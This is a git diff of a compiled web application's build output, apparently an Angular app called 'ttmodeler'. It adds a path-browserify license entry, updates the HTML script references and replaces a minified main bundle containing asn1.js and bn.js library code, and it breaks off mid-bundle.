diff --git a/3rdpartylicenses.txt b/3rdpartylicenses.txt index c2c7a5f..80ef3d8 100644 --- a/3rdpartylicenses.txt +++ b/3rdpartylicenses.txt @@ -3569,6 +3569,30 @@ ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. +path-browserify +MIT +MIT License + +Copyright (c) 2013 James Halliday + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + pbkdf2 MIT The MIT License (MIT) diff --git a/404.html b/404.html index a2476af..f7ea3f6 100644 --- a/404.html +++ b/404.html @@ -17,6 +17,6 @@ Loading... - + \ No newline at end of file diff --git a/index.html b/index.html index 9c2dbb6..41af451 100644 --- a/index.html +++ b/index.html @@ -13,6 +13,6 @@ Loading... - + \ No newline at end of file diff --git a/main.b996b2484435e706.js b/main.3b7d792efd3c1a23.js similarity index 64% rename from main.b996b2484435e706.js rename to main.3b7d792efd3c1a23.js index 138e0ff..67f85c5 100644 --- a/main.b996b2484435e706.js +++ b/main.3b7d792efd3c1a23.js @@ -1 +1 @@ -var Mbt=Object.defineProperty,vbt=Object.defineProperties,Abt=Object.getOwnPropertyDescriptors,JT=Object.getOwnPropertySymbols,KZ=Object.prototype.hasOwnProperty,XZ=Object.prototype.propertyIsEnumerable,Lo=Math.pow,$Z=(Pe,we,de)=>we in Pe?Mbt(Pe,we,{enumerable:!0,configurable:!0,writable:!0,value:de}):Pe[we]=de,ZT=(Pe,we)=>{for(var de in we||(we={}))KZ.call(we,de)&&$Z(Pe,de,we[de]);if(JT)for(var de of JT(we))XZ.call(we,de)&&$Z(Pe,de,we[de]);return Pe},L7=(Pe,we)=>vbt(Pe,Abt(we)),YZ=(Pe,we)=>{var de={};for(var ie in Pe)KZ.call(Pe,ie)&&we.indexOf(ie)<0&&(de[ie]=Pe[ie]);if(null!=Pe&&JT)for(var ie of JT(Pe))we.indexOf(ie)<0&&XZ.call(Pe,ie)&&(de[ie]=Pe[ie]);return de};(self.webpackChunkttmodeler=self.webpackChunkttmodeler||[]).push([[179],{7758:(Pe,we,de)=>{"use strict";const ie=we;ie.bignum=de(9831),ie.define=de(4150).define,ie.base=de(3784),ie.constants=de(8482),ie.decoders=de(4917),ie.encoders=de(6530)},4150:(Pe,we,de)=>{"use strict";const ie=de(6530),j=de(4917),Q=de(2270);function I($,U){this.name=$,this.body=U,this.decoders={},this.encoders={}}we.define=function(U,E){return new I(U,E)},I.prototype._createNamed=function(U){const E=this.name;function C(b){this._initNamed(b,E)}return Q(C,U),C.prototype._initNamed=function(_,y){U.call(this,_,y)},new C(this)},I.prototype._getDecoder=function(U){return this.decoders.hasOwnProperty(U=U||"der")||(this.decoders[U]=this._createNamed(j[U])),this.decoders[U]},I.prototype.decode=function(U,E,C){return this._getDecoder(E).decode(U,C)},I.prototype._getEncoder=function(U){return this.encoders.hasOwnProperty(U=U||"der")||(this.encoders[U]=this._createNamed(ie[U])),this.encoders[U]},I.prototype.encode=function(U,E,C){return this._getEncoder(E).encode(U,C)}},216:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(1317).b,Q=de(9173).Buffer;function ae($,U){j.call(this,U),Q.isBuffer($)?(this.base=$,this.offset=0,this.length=$.length):this.error("Input not Buffer")}function I($,U){if(Array.isArray($))this.length=0,this.value=$.map(function(E){return I.isEncoderBuffer(E)||(E=new I(E,U)),this.length+=E.length,E},this);else if("number"==typeof $){if(!(0<=$&&$<=255))return U.error("non-byte EncoderBuffer value");this.value=$,this.length=1}else if("string"==typeof $)this.value=$,this.length=Q.byteLength($);else{if(!Q.isBuffer($))return U.error("Unsupported type: "+typeof $);this.value=$,this.length=$.length}}ie(ae,j),we.C=ae,ae.isDecoderBuffer=function(U){return U instanceof ae||"object"==typeof U&&Q.isBuffer(U.base)&&"DecoderBuffer"===U.constructor.name&&"number"==typeof U.offset&&"number"==typeof U.length&&"function"==typeof U.save&&"function"==typeof U.restore&&"function"==typeof U.isEmpty&&"function"==typeof U.readUInt8&&"function"==typeof U.skip&&"function"==typeof U.raw},ae.prototype.save=function(){return{offset:this.offset,reporter:j.prototype.save.call(this)}},ae.prototype.restore=function(U){const E=new ae(this.base);return E.offset=U.offset,E.length=this.offset,this.offset=U.offset,j.prototype.restore.call(this,U.reporter),E},ae.prototype.isEmpty=function(){return this.offset===this.length},ae.prototype.readUInt8=function(U){return this.offset+1<=this.length?this.base.readUInt8(this.offset++,!0):this.error(U||"DecoderBuffer overrun")},ae.prototype.skip=function(U,E){if(!(this.offset+U<=this.length))return this.error(E||"DecoderBuffer overrun");const C=new ae(this.base);return C._reporterState=this._reporterState,C.offset=this.offset,C.length=this.offset+U,this.offset+=U,C},ae.prototype.raw=function(U){return this.base.slice(U?U.offset:this.offset,this.length)},we.R=I,I.isEncoderBuffer=function(U){return U instanceof I||"object"==typeof U&&"EncoderBuffer"===U.constructor.name&&"number"==typeof U.length&&"function"==typeof U.join},I.prototype.join=function(U,E){return U||(U=Q.alloc(this.length)),E||(E=0),0===this.length||(Array.isArray(this.value)?this.value.forEach(function(C){C.join(U,E),E+=C.length}):("number"==typeof this.value?U[E]=this.value:"string"==typeof this.value?U.write(this.value,E):Q.isBuffer(this.value)&&this.value.copy(U,E),E+=this.length)),U}},3784:(Pe,we,de)=>{"use strict";const ie=we;ie.Reporter=de(1317).b,ie.DecoderBuffer=de(216).C,ie.EncoderBuffer=de(216).R,ie.Node=de(2108)},2108:(Pe,we,de)=>{"use strict";const ie=de(1317).b,j=de(216).R,Q=de(216).C,ae=de(490),I=["seq","seqof","set","setof","objid","bool","gentime","utctime","null_","enum","int","objDesc","bitstr","bmpstr","charstr","genstr","graphstr","ia5str","iso646str","numstr","octstr","printstr","t61str","unistr","utf8str","videostr"],$=["key","obj","use","optional","explicit","implicit","def","choice","any","contains"].concat(I);function E(b,_,y){const A={};this._baseState=A,A.name=y,A.enc=b,A.parent=_||null,A.children=null,A.tag=null,A.args=null,A.reverseArgs=null,A.choice=null,A.optional=!1,A.any=!1,A.obj=!1,A.use=null,A.useDecoder=null,A.key=null,A.default=null,A.explicit=null,A.implicit=null,A.contains=null,A.parent||(A.children=[],this._wrap())}Pe.exports=E;const C=["enc","parent","children","tag","args","reverseArgs","choice","optional","any","obj","use","alteredUse","key","default","explicit","implicit","contains"];E.prototype.clone=function(){const _=this._baseState,y={};C.forEach(function(p){y[p]=_[p]});const A=new this.constructor(y.parent);return A._baseState=y,A},E.prototype._wrap=function(){const _=this._baseState;$.forEach(function(y){this[y]=function(){const p=new this.constructor(this);return _.children.push(p),p[y].apply(p,arguments)}},this)},E.prototype._init=function(_){const y=this._baseState;ae(null===y.parent),_.call(this),y.children=y.children.filter(function(A){return A._baseState.parent===this},this),ae.equal(y.children.length,1,"Root node can have only one child")},E.prototype._useArgs=function(_){const y=this._baseState,A=_.filter(function(p){return p instanceof this.constructor},this);_=_.filter(function(p){return!(p instanceof this.constructor)},this),0!==A.length&&(ae(null===y.children),y.children=A,A.forEach(function(p){p._baseState.parent=this},this)),0!==_.length&&(ae(null===y.args),y.args=_,y.reverseArgs=_.map(function(p){if("object"!=typeof p||p.constructor!==Object)return p;const D={};return Object.keys(p).forEach(function(w){w==(0|w)&&(w|=0),D[p[w]]=w}),D}))},["_peekTag","_decodeTag","_use","_decodeStr","_decodeObjid","_decodeTime","_decodeNull","_decodeInt","_decodeBool","_decodeList","_encodeComposite","_encodeStr","_encodeObjid","_encodeTime","_encodeNull","_encodeInt","_encodeBool"].forEach(function(b){E.prototype[b]=function(){throw new Error(b+" not implemented for encoding: "+this._baseState.enc)}}),I.forEach(function(b){E.prototype[b]=function(){const y=this._baseState,A=Array.prototype.slice.call(arguments);return ae(null===y.tag),y.tag=b,this._useArgs(A),this}}),E.prototype.use=function(_){ae(_);const y=this._baseState;return ae(null===y.use),y.use=_,this},E.prototype.optional=function(){return this._baseState.optional=!0,this},E.prototype.def=function(_){const y=this._baseState;return ae(null===y.default),y.default=_,y.optional=!0,this},E.prototype.explicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.explicit=_,this},E.prototype.implicit=function(_){const y=this._baseState;return ae(null===y.explicit&&null===y.implicit),y.implicit=_,this},E.prototype.obj=function(){const _=this._baseState,y=Array.prototype.slice.call(arguments);return _.obj=!0,0!==y.length&&this._useArgs(y),this},E.prototype.key=function(_){const y=this._baseState;return ae(null===y.key),y.key=_,this},E.prototype.any=function(){return this._baseState.any=!0,this},E.prototype.choice=function(_){const y=this._baseState;return ae(null===y.choice),y.choice=_,this._useArgs(Object.keys(_).map(function(A){return _[A]})),this},E.prototype.contains=function(_){const y=this._baseState;return ae(null===y.use),y.contains=_,this},E.prototype._decode=function(_,y){const A=this._baseState;if(null===A.parent)return _.wrapResult(A.children[0]._decode(_,y));let x,p=A.default,D=!0,w=null;if(null!==A.key&&(w=_.enterKey(A.key)),A.optional){let S=null;if(null!==A.explicit?S=A.explicit:null!==A.implicit?S=A.implicit:null!==A.tag&&(S=A.tag),null!==S||A.any){if(D=this._peekTag(_,S,A.any),_.isError(D))return D}else{const O=_.save();try{null===A.choice?this._decodeGeneric(A.tag,_,y):this._decodeChoice(_,y),D=!0}catch(B){D=!1}_.restore(O)}}if(A.obj&&D&&(x=_.enterObject()),D){if(null!==A.explicit){const O=this._decodeTag(_,A.explicit);if(_.isError(O))return O;_=O}const S=_.offset;if(null===A.use&&null===A.choice){let O;A.any&&(O=_.save());const B=this._decodeTag(_,null!==A.implicit?A.implicit:A.tag,A.any);if(_.isError(B))return B;A.any?p=_.raw(O):_=B}if(y&&y.track&&null!==A.tag&&y.track(_.path(),S,_.length,"tagged"),y&&y.track&&null!==A.tag&&y.track(_.path(),_.offset,_.length,"content"),A.any||(p=null===A.choice?this._decodeGeneric(A.tag,_,y):this._decodeChoice(_,y)),_.isError(p))return p;if(!A.any&&null===A.choice&&null!==A.children&&A.children.forEach(function(B){B._decode(_,y)}),A.contains&&("octstr"===A.tag||"bitstr"===A.tag)){const O=new Q(p);p=this._getUse(A.contains,_._reporterState.obj)._decode(O,y)}}return A.obj&&D&&(p=_.leaveObject(x)),null===A.key||null===p&&!0!==D?null!==w&&_.exitKey(w):_.leaveKey(w,A.key,p),p},E.prototype._decodeGeneric=function(_,y,A){const p=this._baseState;return"seq"===_||"set"===_?null:"seqof"===_||"setof"===_?this._decodeList(y,_,p.args[0],A):/str$/.test(_)?this._decodeStr(y,_,A):"objid"===_&&p.args?this._decodeObjid(y,p.args[0],p.args[1],A):"objid"===_?this._decodeObjid(y,null,null,A):"gentime"===_||"utctime"===_?this._decodeTime(y,_,A):"null_"===_?this._decodeNull(y,A):"bool"===_?this._decodeBool(y,A):"objDesc"===_?this._decodeStr(y,_,A):"int"===_||"enum"===_?this._decodeInt(y,p.args&&p.args[0],A):null!==p.use?this._getUse(p.use,y._reporterState.obj)._decode(y,A):y.error("unknown tag: "+_)},E.prototype._getUse=function(_,y){const A=this._baseState;return A.useDecoder=this._use(_,y),ae(null===A.useDecoder._baseState.parent),A.useDecoder=A.useDecoder._baseState.children[0],A.implicit!==A.useDecoder._baseState.implicit&&(A.useDecoder=A.useDecoder.clone(),A.useDecoder._baseState.implicit=A.implicit),A.useDecoder},E.prototype._decodeChoice=function(_,y){const A=this._baseState;let p=null,D=!1;return Object.keys(A.choice).some(function(w){const x=_.save(),S=A.choice[w];try{const O=S._decode(_,y);if(_.isError(O))return!1;p={type:w,value:O},D=!0}catch(O){return _.restore(x),!1}return!0},this),D?p:_.error("Choice not matched")},E.prototype._createEncoderBuffer=function(_){return new j(_,this.reporter)},E.prototype._encode=function(_,y,A){const p=this._baseState;if(null!==p.default&&p.default===_)return;const D=this._encodeValue(_,y,A);return void 0===D||this._skipDefault(D,y,A)?void 0:D},E.prototype._encodeValue=function(_,y,A){const p=this._baseState;if(null===p.parent)return p.children[0]._encode(_,y||new ie);let D=null;if(this.reporter=y,p.optional&&void 0===_){if(null===p.default)return;_=p.default}let w=null,x=!1;if(p.any)D=this._createEncoderBuffer(_);else if(p.choice)D=this._encodeChoice(_,y);else if(p.contains)w=this._getUse(p.contains,A)._encode(_,y),x=!0;else if(p.children)w=p.children.map(function(S){if("null_"===S._baseState.tag)return S._encode(null,y,_);if(null===S._baseState.key)return y.error("Child should have a key");const O=y.enterKey(S._baseState.key);if("object"!=typeof _)return y.error("Child expected, but input is not object");const B=S._encode(_[S._baseState.key],y,_);return y.leaveKey(O),B},this).filter(function(S){return S}),w=this._createEncoderBuffer(w);else if("seqof"===p.tag||"setof"===p.tag){if(!p.args||1!==p.args.length)return y.error("Too many args for : "+p.tag);if(!Array.isArray(_))return y.error("seqof/setof, but data is not Array");const S=this.clone();S._baseState.implicit=null,w=this._createEncoderBuffer(_.map(function(O){return this._getUse(this._baseState.args[0],_)._encode(O,y)},S))}else null!==p.use?D=this._getUse(p.use,A)._encode(_,y):(w=this._encodePrimitive(p.tag,_),x=!0);if(!p.any&&null===p.choice){const S=null!==p.implicit?p.implicit:p.tag,O=null===p.implicit?"universal":"context";null===S?null===p.use&&y.error("Tag could be omitted only for .use()"):null===p.use&&(D=this._encodeComposite(S,x,O,w))}return null!==p.explicit&&(D=this._encodeComposite(p.explicit,!1,"context",D)),D},E.prototype._encodeChoice=function(_,y){const A=this._baseState,p=A.choice[_.type];return p||ae(!1,_.type+" not found in "+JSON.stringify(Object.keys(A.choice))),p._encode(_.value,y)},E.prototype._encodePrimitive=function(_,y){const A=this._baseState;if(/str$/.test(_))return this._encodeStr(y,_);if("objid"===_&&A.args)return this._encodeObjid(y,A.reverseArgs[0],A.args[1]);if("objid"===_)return this._encodeObjid(y,null,null);if("gentime"===_||"utctime"===_)return this._encodeTime(y,_);if("null_"===_)return this._encodeNull();if("int"===_||"enum"===_)return this._encodeInt(y,A.args&&A.reverseArgs[0]);if("bool"===_)return this._encodeBool(y);if("objDesc"===_)return this._encodeStr(y,_);throw new Error("Unsupported tag: "+_)},E.prototype._isNumstr=function(_){return/^[0-9 ]*$/.test(_)},E.prototype._isPrintstr=function(_){return/^[A-Za-z0-9 '()+,-./:=?]*$/.test(_)}},1317:(Pe,we,de)=>{"use strict";const ie=de(2270);function j(ae){this._reporterState={obj:null,path:[],options:ae||{},errors:[]}}function Q(ae,I){this.path=ae,this.rethrow(I)}we.b=j,j.prototype.isError=function(I){return I instanceof Q},j.prototype.save=function(){const I=this._reporterState;return{obj:I.obj,pathLen:I.path.length}},j.prototype.restore=function(I){const $=this._reporterState;$.obj=I.obj,$.path=$.path.slice(0,I.pathLen)},j.prototype.enterKey=function(I){return this._reporterState.path.push(I)},j.prototype.exitKey=function(I){const $=this._reporterState;$.path=$.path.slice(0,I-1)},j.prototype.leaveKey=function(I,$,U){const E=this._reporterState;this.exitKey(I),null!==E.obj&&(E.obj[$]=U)},j.prototype.path=function(){return this._reporterState.path.join("/")},j.prototype.enterObject=function(){const I=this._reporterState,$=I.obj;return I.obj={},$},j.prototype.leaveObject=function(I){const $=this._reporterState,U=$.obj;return $.obj=I,U},j.prototype.error=function(I){let $;const U=this._reporterState,E=I instanceof Q;if($=E?I:new Q(U.path.map(function(C){return"["+JSON.stringify(C)+"]"}).join(""),I.message||I,I.stack),!U.options.partial)throw $;return E||U.errors.push($),$},j.prototype.wrapResult=function(I){const $=this._reporterState;return $.options.partial?{result:this.isError(I)?null:I,errors:$.errors}:I},ie(Q,Error),Q.prototype.rethrow=function(I){if(this.message=I+" at: "+(this.path||"(shallow)"),Error.captureStackTrace&&Error.captureStackTrace(this,Q),!this.stack)try{throw new Error(this.message)}catch($){this.stack=$.stack}return this}},6629:(Pe,we)=>{"use strict";function de(ie){const j={};return Object.keys(ie).forEach(function(Q){(0|Q)==Q&&(Q|=0),j[ie[Q]]=Q}),j}we.tagClass={0:"universal",1:"application",2:"context",3:"private"},we.tagClassByName=de(we.tagClass),we.tag={0:"end",1:"bool",2:"int",3:"bitstr",4:"octstr",5:"null_",6:"objid",7:"objDesc",8:"external",9:"real",10:"enum",11:"embed",12:"utf8str",13:"relativeOid",16:"seq",17:"set",18:"numstr",19:"printstr",20:"t61str",21:"videostr",22:"ia5str",23:"utctime",24:"gentime",25:"graphstr",26:"iso646str",27:"genstr",28:"unistr",29:"charstr",30:"bmpstr"},we.tagByName=de(we.tag)},8482:(Pe,we,de)=>{"use strict";const ie=we;ie._reverse=function(Q){const ae={};return Object.keys(Q).forEach(function(I){(0|I)==I&&(I|=0),ae[Q[I]]=I}),ae},ie.der=de(6629)},6948:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9831),Q=de(216).C,ae=de(2108),I=de(6629);function $(b){this.enc="der",this.name=b.name,this.entity=b,this.tree=new U,this.tree._init(b.body)}function U(b){ae.call(this,"der",b)}function E(b,_){let y=b.readUInt8(_);if(b.isError(y))return y;const A=I.tagClass[y>>6],p=0==(32&y);if(31==(31&y)){let w=y;for(y=0;128==(128&w);){if(w=b.readUInt8(_),b.isError(w))return w;y<<=7,y|=127&w}}else y&=31;return{cls:A,primitive:p,tag:y,tagStr:I.tag[y]}}function C(b,_,y){let A=b.readUInt8(y);if(b.isError(A))return A;if(!_&&128===A)return null;if(0==(128&A))return A;const p=127&A;if(p>4)return b.error("length octect is too long");A=0;for(let D=0;D{"use strict";const ie=we;ie.der=de(6948),ie.pem=de(1805)},1805:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(9173).Buffer,Q=de(6948);function ae(I){Q.call(this,I),this.enc="pem"}ie(ae,Q),Pe.exports=ae,ae.prototype.decode=function($,U){const E=$.toString().split(/[\r\n]+/g),C=U.label.toUpperCase(),b=/^-----(BEGIN|END) ([^-]+)-----$/;let _=-1,y=-1;for(let D=0;D{"use strict";const ie=de(2270),j=de(9173).Buffer,Q=de(2108),ae=de(6629);function I(C){this.enc="der",this.name=C.name,this.entity=C,this.tree=new $,this.tree._init(C.body)}function $(C){Q.call(this,"der",C)}function U(C){return C<10?"0"+C:C}Pe.exports=I,I.prototype.encode=function(b,_){return this.tree._encode(b,_).join()},ie($,Q),$.prototype._encodeComposite=function(b,_,y,A){const p=function E(C,b,_,y){let A;if("seqof"===C?C="seq":"setof"===C&&(C="set"),ae.tagByName.hasOwnProperty(C))A=ae.tagByName[C];else{if("number"!=typeof C||(0|C)!==C)return y.error("Unknown tag: "+C);A=C}return A>=31?y.error("Multi-octet tag encoding unsupported"):(b||(A|=32),A|=ae.tagClassByName[_||"universal"]<<6,A)}(b,_,y,this.reporter);if(A.length<128){const x=j.alloc(2);return x[0]=p,x[1]=A.length,this._createEncoderBuffer([x,A])}let D=1;for(let x=A.length;x>=256;x>>=8)D++;const w=j.alloc(2+D);w[0]=p,w[1]=128|D;for(let x=1+D,S=A.length;S>0;x--,S>>=8)w[x]=255&S;return this._createEncoderBuffer([w,A])},$.prototype._encodeStr=function(b,_){if("bitstr"===_)return this._createEncoderBuffer([0|b.unused,b.data]);if("bmpstr"===_){const y=j.alloc(2*b.length);for(let A=0;A=40)return this.reporter.error("Second objid identifier OOB");b.splice(0,2,40*b[0]+b[1])}let A=0;for(let w=0;w=128;x>>=7)A++}const p=j.alloc(A);let D=p.length-1;for(let w=b.length-1;w>=0;w--){let x=b[w];for(p[D--]=127&x;(x>>=7)>0;)p[D--]=128|127&x}return this._createEncoderBuffer(p)},$.prototype._encodeTime=function(b,_){let y;const A=new Date(b);return"gentime"===_?y=[U(A.getUTCFullYear()),U(A.getUTCMonth()+1),U(A.getUTCDate()),U(A.getUTCHours()),U(A.getUTCMinutes()),U(A.getUTCSeconds()),"Z"].join(""):"utctime"===_?y=[U(A.getUTCFullYear()%100),U(A.getUTCMonth()+1),U(A.getUTCDate()),U(A.getUTCHours()),U(A.getUTCMinutes()),U(A.getUTCSeconds()),"Z"].join(""):this.reporter.error("Encoding "+_+" time is not supported yet"),this._encodeStr(y,"octstr")},$.prototype._encodeNull=function(){return this._createEncoderBuffer("")},$.prototype._encodeInt=function(b,_){if("string"==typeof b){if(!_)return this.reporter.error("String int or enum given, but no values map");if(!_.hasOwnProperty(b))return this.reporter.error("Values map doesn't contain: "+JSON.stringify(b));b=_[b]}if("number"!=typeof b&&!j.isBuffer(b)){const p=b.toArray();!b.sign&&128&p[0]&&p.unshift(0),b=j.from(p)}if(j.isBuffer(b)){let p=b.length;0===b.length&&p++;const D=j.alloc(p);return b.copy(D),0===b.length&&(D[0]=0),this._createEncoderBuffer(D)}if(b<128)return this._createEncoderBuffer(b);if(b<256)return this._createEncoderBuffer([0,b]);let y=1;for(let p=b;p>=256;p>>=8)y++;const A=new Array(y);for(let p=A.length-1;p>=0;p--)A[p]=255&b,b>>=8;return 128&A[0]&&A.unshift(0),this._createEncoderBuffer(j.from(A))},$.prototype._encodeBool=function(b){return this._createEncoderBuffer(b?255:0)},$.prototype._use=function(b,_){return"function"==typeof b&&(b=b(_)),b._getEncoder("der").tree},$.prototype._skipDefault=function(b,_,y){const A=this._baseState;let p;if(null===A.default)return!1;const D=b.join();if(void 0===A.defaultBuffer&&(A.defaultBuffer=this._encodeValue(A.default,_,y).join()),D.length!==A.defaultBuffer.length)return!1;for(p=0;p{"use strict";const ie=we;ie.der=de(8018),ie.pem=de(3510)},3510:(Pe,we,de)=>{"use strict";const ie=de(2270),j=de(8018);function Q(ae){j.call(this,ae),this.enc="pem"}ie(Q,j),Pe.exports=Q,Q.prototype.encode=function(I,$){const E=j.prototype.encode.call(this,I).toString("base64"),C=["-----BEGIN "+$.label+"-----"];for(let b=0;b=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var v=U(z,f);return f-1>=l&&(v|=U(z,f-1)<<4),v}function C(z,l,f,v){for(var M=0,P=Math.min(z.length,f),G=l;G=49?X-49+10:X>=17?X-17+10:X}return M}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,v){if("number"==typeof l)return this._initNumber(l,f,v);if("object"==typeof l)return this._initArray(l,f,v);"hex"===f&&(f=16),Q(f===(0|f)&&f>=2&&f<=36);var M=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(M++,this.negative=1),M=0;M-=3)this.words[P]|=(G=l[M]|l[M-1]<<8|l[M-2]<<16)<>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===v)for(M=0,P=0;M>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,v){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var M=0;M=f;M-=2)X=E(l,f,M)<=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(M=(l.length-f)%2==0?f+1:f;M=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,v){this.words=[0],this.length=1;for(var M=0,P=1;P<=67108863;P*=f)M++;M--,P=P/f|0;for(var G=l.length-v,X=G%M,L=Math.min(G,G-X)+v,h=0,R=v;R1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?""};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var 